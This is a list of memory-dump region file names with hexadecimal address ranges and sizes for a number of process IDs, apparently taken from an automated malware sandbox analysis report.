memory/1564-215-0x0000000019190000-0x0000000019191000-memory.dmpFilesize
4KB
-
memory/1564-157-0x0000000000000000-mapping.dmp
-
memory/1564-36-0x0000000000000000-mapping.dmp
-
memory/1580-227-0x0000000000000000-mapping.dmp
-
memory/1580-43-0x0000000000000000-mapping.dmp
-
memory/1608-234-0x0000000000000000-mapping.dmp
-
memory/1644-46-0x0000000000000000-mapping.dmp
-
memory/1664-83-0x0000000000000000-mapping.dmp
-
memory/1664-38-0x0000000000000000-mapping.dmp
-
memory/1696-228-0x0000000000000000-mapping.dmp
-
memory/1696-44-0x0000000000000000-mapping.dmp
-
memory/1728-45-0x0000000000000000-mapping.dmp
-
memory/1776-288-0x0000000000080000-0x0000000000094000-memory.dmpFilesize
80KB
-
memory/1776-296-0x0000000000BD0000-0x0000000000BF0000-memory.dmpFilesize
128KB
-
memory/1776-295-0x0000000000520000-0x0000000000540000-memory.dmpFilesize
128KB
-
memory/1812-37-0x0000000000000000-mapping.dmp
-
memory/1852-39-0x0000000000000000-mapping.dmp
-
memory/1932-2-0x000007FEFB541000-0x000007FEFB543000-memory.dmpFilesize
8KB
-
memory/1932-258-0x0000000002380000-0x0000000002384000-memory.dmpFilesize
16KB
-
memory/1948-35-0x0000000000000000-mapping.dmp
-
memory/2028-41-0x0000000000000000-mapping.dmp
-
memory/2072-50-0x0000000000000000-mapping.dmp
-
memory/2072-71-0x0000000000000000-mapping.dmp
-
memory/2080-221-0x0000000000000000-mapping.dmp
-
memory/2112-51-0x0000000000000000-mapping.dmp
-
memory/2112-155-0x0000000000000000-mapping.dmp
-
memory/2140-154-0x0000000000000000-mapping.dmp
-
memory/2180-222-0x0000000000000000-mapping.dmp
-
memory/2192-156-0x0000000000000000-mapping.dmp
-
memory/2240-225-0x0000000000000000-mapping.dmp
-
memory/2296-53-0x0000000000000000-mapping.dmp
-
memory/2348-226-0x0000000000000000-mapping.dmp
-
memory/2376-74-0x0000000000FA0000-0x0000000000FA1000-memory.dmpFilesize
4KB
-
memory/2376-84-0x0000000019660000-0x0000000019661000-memory.dmpFilesize
4KB
-
memory/2376-75-0x0000000000FB0000-0x0000000000FB1000-memory.dmpFilesize
4KB
-
memory/2376-54-0x0000000000000000-mapping.dmp
-
memory/2376-59-0x0000000019710000-0x0000000019712000-memory.dmpFilesize
8KB
-
memory/2376-60-0x0000000019714000-0x0000000019716000-memory.dmpFilesize
8KB
-
memory/2376-70-0x0000000000E60000-0x0000000000E61000-memory.dmpFilesize
4KB
-
memory/2376-72-0x0000000000EF0000-0x0000000000EF1000-memory.dmpFilesize
4KB
-
memory/2376-82-0x0000000001170000-0x0000000001171000-memory.dmpFilesize
4KB
-
memory/2376-56-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2376-96-0x00000000011A0000-0x00000000011A1000-memory.dmpFilesize
4KB
-
memory/2376-73-0x0000000000F00000-0x0000000000F01000-memory.dmpFilesize
4KB
-
memory/2380-207-0x0000000000000000-mapping.dmp
-
memory/2420-250-0x0000000002610000-0x0000000002612000-memory.dmpFilesize
8KB
-
memory/2420-247-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2420-251-0x0000000002614000-0x0000000002616000-memory.dmpFilesize
8KB
-
memory/2444-229-0x0000000000000000-mapping.dmp
-
memory/2448-231-0x0000000000000000-mapping.dmp
-
memory/2468-230-0x0000000000000000-mapping.dmp
-
memory/2524-184-0x0000000000000000-mapping.dmp
-
memory/2584-114-0x0000000000000000-mapping.dmp
-
memory/2584-186-0x0000000000000000-mapping.dmp
-
memory/2600-190-0x0000000000000000-mapping.dmp
-
memory/2628-91-0x0000000000000000-mapping.dmp
-
memory/2628-246-0x00000000193B9000-0x00000000193BB000-memory.dmpFilesize
8KB
-
memory/2628-242-0x000000001B120000-0x000000001B122000-memory.dmpFilesize
8KB
-
memory/2628-93-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2628-98-0x0000000019390000-0x0000000019392000-memory.dmpFilesize
8KB
-
memory/2628-99-0x0000000019394000-0x0000000019396000-memory.dmpFilesize
8KB
-
memory/2628-125-0x000000001939A000-0x00000000193B9000-memory.dmpFilesize
124KB
-
memory/2644-199-0x0000000019464000-0x0000000019466000-memory.dmpFilesize
8KB
-
memory/2644-191-0x0000000000000000-mapping.dmp
-
memory/2644-195-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2644-198-0x0000000019460000-0x0000000019462000-memory.dmpFilesize
8KB
-
memory/2732-115-0x0000000000000000-mapping.dmp
-
memory/2736-235-0x0000000000000000-mapping.dmp
-
memory/2740-118-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2740-121-0x0000000019780000-0x0000000019782000-memory.dmpFilesize
8KB
-
memory/2740-122-0x0000000019784000-0x0000000019786000-memory.dmpFilesize
8KB
-
memory/2740-116-0x0000000000000000-mapping.dmp
-
memory/2788-168-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2788-179-0x0000000019584000-0x0000000019586000-memory.dmpFilesize
8KB
-
memory/2788-178-0x0000000019580000-0x0000000019582000-memory.dmpFilesize
8KB
-
memory/2788-158-0x0000000000000000-mapping.dmp
-
memory/2788-236-0x000000001958A000-0x00000000195A9000-memory.dmpFilesize
124KB
-
memory/2792-232-0x0000000000000000-mapping.dmp
-
memory/2864-233-0x0000000000000000-mapping.dmp
-
memory/2924-216-0x0000000000000000-mapping.dmp
-
memory/2964-218-0x0000000000000000-mapping.dmp
-
memory/2976-220-0x0000000000000000-mapping.dmp
-
memory/3036-149-0x0000000000000000-mapping.dmp
-
memory/3040-150-0x0000000000000000-mapping.dmp
-
memory/3068-312-0x0000000000F00000-0x0000000000F02000-memory.dmpFilesize
8KB
-
memory/3068-282-0x00000000192E0000-0x00000000192E1000-memory.dmpFilesize
4KB
-
memory/3068-298-0x0000000000950000-0x0000000000951000-memory.dmpFilesize
4KB
-
memory/3068-324-0x0000000000AE0000-0x0000000000AE1000-memory.dmpFilesize
4KB
-
memory/3068-303-0x0000000000F1A000-0x0000000000F39000-memory.dmpFilesize
124KB
-
memory/3068-323-0x0000000000F3A000-0x0000000000F3B000-memory.dmpFilesize
4KB
-
memory/3068-322-0x0000000000F39000-0x0000000000F3A000-memory.dmpFilesize
4KB
-
memory/3068-152-0x0000000000000000-mapping.dmp
-
memory/3068-281-0x0000000000940000-0x0000000000942000-memory.dmpFilesize
8KB
-
memory/3068-162-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/3068-169-0x0000000000F10000-0x0000000000F12000-memory.dmpFilesize
8KB
-
memory/3068-170-0x0000000000F14000-0x0000000000F16000-memory.dmpFilesize
8KB
-
memory/3068-283-0x0000000019F10000-0x0000000019F11000-memory.dmpFilesize
4KB
-
memory/3068-275-0x0000000000930000-0x0000000000932000-memory.dmpFilesize
8KB
-
memory/3320-317-0x000000001A2E0000-0x000000001A2E1000-memory.dmpFilesize
4KB
-
memory/3320-318-0x00000000008F0000-0x00000000008F1000-memory.dmpFilesize
4KB
-
memory/3320-313-0x0000000001040000-0x0000000001041000-memory.dmpFilesize
4KB
-
memory/3320-321-0x00000000011D0000-0x00000000011D2000-memory.dmpFilesize
8KB
-
memory/3320-304-0x0000000001070000-0x0000000001072000-memory.dmpFilesize
8KB
-
memory/3320-305-0x0000000001074000-0x0000000001076000-memory.dmpFilesize
8KB
-
memory/3320-300-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/3908-267-0x00000000008A0000-0x00000000008B1000-memory.dmpFilesize
68KB